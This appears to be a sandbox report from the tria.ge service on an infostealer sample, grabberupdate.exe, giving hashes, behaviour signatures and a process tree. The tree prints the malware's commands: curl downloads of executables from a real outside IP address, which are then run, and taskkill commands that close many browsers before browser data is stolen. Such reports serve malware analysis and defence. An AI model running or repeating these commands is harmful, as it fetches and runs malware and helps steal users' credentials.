Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

grabberupdate.exe

windows10-2004-x64

10

grabberupdate.exe

windows11-21h2-x64

8

Analysis

  • max time kernel
    213s
  • max time network
    282s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    22/05/2024, 21:27

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    grabberupdate.exe

  • Size

    87KB

  • MD5

    ab378d6539627c52dbfc272c83eb420c

  • SHA1

    039060f0fdefbe0a62147a7bbad9b1a526a78d61

  • SHA256

    2a0ac2b38c51d764422f55d55a0bca58be786c10b0b1386c5dce3055894c0ef2

  • SHA512

    afe3be5f89ad67e2c4440d44c6ed890853eecb6cf34faed20d61ae49f30fa30a5cc390393b3ef4609a34a2121b6831cacf00ee6aa62c268e0b9fce0223bb0222

  • SSDEEP

    1536:L7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIfNxFOy:Hq6+ouCpk2mpcWJ0r+QNTBfNZ

Score
8/10
spywarestealer

Malware Config

Signatures

  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 15 IoCs
    evasion
  • Modifies registry class 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\grabberupdate.exe
    "C:\Users\Admin\AppData\Local\Temp\grabberupdate.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1360
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\62F0.tmp\62F1.tmp\62F2.bat C:\Users\Admin\AppData\Local\Temp\grabberupdate.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:760
      • C:\Windows\system32\curl.exe
        curl -s -o grabber.exe "http://188.212.100.57:54391/download/grabber.exe"
        3⤵
          PID:3644
        • C:\Windows\system32\curl.exe
          curl -s -o wlms.exe "http://188.212.100.57:54391/download/wlms.exe"
          3⤵
            PID:2536
          • C:\Users\Admin\AppData\Local\Temp\grabber.exe
            grabber.exe
            3⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:3748
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\79F3.tmp\79F4.tmp\79F5.bat C:\Users\Admin\AppData\Local\Temp\grabber.exe"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4604
              • C:\Windows\system32\curl.exe
                curl -s -o ram.exe http://188.212.100.57:54391/download/shell.exe
                5⤵
                  PID:1488
                • C:\Windows\system32\curl.exe
                  curl -s -o rm.exe http://188.212.100.57:54391/download/winlogon.exe
                  5⤵
                    PID:1840
                  • C:\Users\Admin\AppData\Local\Temp\ram.exe
                    ram.exe
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:2800
                    • C:\Windows\system32\taskkill.exe
                      taskkill /F /IM chrome.exe /T
                      6⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2968
                    • C:\Windows\system32\taskkill.exe
                      taskkill /F /IM firefox.exe /T
                      6⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1572
                    • C:\Windows\system32\taskkill.exe
                      taskkill /F /IM brave.exe /T
                      6⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3576
                    • C:\Windows\system32\taskkill.exe
                      taskkill /F /IM opera.exe /T
                      6⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:5016
                    • C:\Windows\system32\taskkill.exe
                      taskkill /F /IM kometa.exe /T
                      6⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2960
                    • C:\Windows\system32\taskkill.exe
                      taskkill /F /IM orbitum.exe /T
                      6⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4716
                    • C:\Windows\system32\taskkill.exe
                      taskkill /F /IM centbrowser.exe /T
                      6⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:568
                    • C:\Windows\system32\taskkill.exe
                      taskkill /F /IM 7star.exe /T
                      6⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4216
                    • C:\Windows\system32\taskkill.exe
                      taskkill /F /IM sputnik.exe /T
                      6⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3380
                    • C:\Windows\system32\taskkill.exe
                      taskkill /F /IM vivaldi.exe /T
                      6⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:564
                    • C:\Windows\system32\taskkill.exe
                      taskkill /F /IM epicprivacybrowser.exe /T
                      6⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3960
                    • C:\Windows\system32\taskkill.exe
                      taskkill /F /IM msedge.exe /T
                      6⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4560
                    • C:\Windows\system32\taskkill.exe
                      taskkill /F /IM uran.exe /T
                      6⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3188
                    • C:\Windows\system32\taskkill.exe
                      taskkill /F /IM yandex.exe /T
                      6⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4416
                    • C:\Windows\system32\taskkill.exe
                      taskkill /F /IM iridium.exe /T
                      6⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4140
          • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
            "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
            1⤵
            • Modifies registry class
            • Suspicious use of SetWindowsHookEx
            PID:4572

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\62F0.tmp\62F1.tmp\62F2.bat
            Filesize

            202B

            MD5

            040dc40ccd7346ace502b30584d4d5a0

            SHA1

            886b8f5f079db8f5569235aa6dff74c1cf89942d

            SHA256

            f209745a8497c9b93a16dda0bf627dc88662184b00658013fec202e129f64450

            SHA512

            0319239eaebf27ff0f6c4be1b9f737da31d39faccbf47f6d0a0506d2771515928b38981d75365a0307defd530ff68b4de37d0af89519d052037782a741c7dc02

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\79F3.tmp\79F4.tmp\79F5.bat
            Filesize

            230B

            MD5

            abdb6860d790577e02cca5005866bbe8

            SHA1

            6c87a9e8b0b29ffe358c079a54f06dd9ef5cfb37

            SHA256

            ee13e97e15c3a2f432a7bfd3af278aa38ff88baa7652ea0bfb2e5d9bf5adb8f0

            SHA512

            1bbcf1d4540019aa392234e91e7629fd9f61240b8d7003df3404536810e639f7019a60bb74c2a08be5f855fd96923d0f8e0cdf7fa3a3d25e1e5829487a959fce

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\cards.json
            Filesize

            4B

            MD5

            37a6259cc0c1dae299a7866489dff0bd

            SHA1

            2be88ca4242c76e8253ac62474851065032d6833

            SHA256

            74234e98afe7498fb5daf1f36ac2d78acc339464f950703b8c019892f982b90b

            SHA512

            04f8ff2682604862e405bf88de102ed7710ac45c1205957625e4ee3e5f5a2241e453614acc451345b91bafc88f38804019c7492444595674e94e8cf4be53817f

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\grabber.exe
            Filesize

            120KB

            MD5

            4e1e436848d533c9a00b762ac148786d

            SHA1

            42962a264fbdbc96eb8267052298be9143ecd8bf

            SHA256

            efcd31afd704c03d8a487a06c795bba7ea0a1cde0866d8fcfd40f4c3ce197bbd

            SHA512

            59d16efac5f0ea7c62d18ef30032eba907b8d6c097463a8244f3d709c85b90ec12387c94a4d8a35dfb59d0cbd2dc02d0b39a1f6bd12c5ccd050d552070fdf30d

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\ram.exe
            Filesize

            7.6MB

            MD5

            2c93399e0b0fc11cd03a56fc844a4816

            SHA1

            d8a6db37b1ac3cc819b04b0f4aac7fe721f88f00

            SHA256

            081da8d5b9e21e11ae3aeafd4ac54ba2e7a45a05abb08139bc1aa0213f1ef155

            SHA512

            dea99c0a22077389f6f6662e644e47ecb55ac010881b135ada2e07ac7a5ba1d42670d52c6cd88804aa3a16783f1e1f39b23fe3f7de6030ede831a27fee30f4a8

            Download Submit

          • memory/2800-20-0x00007FF7746C0000-0x00007FF774EF3000-memory.dmp

            Filesize

            8.2MB

            Download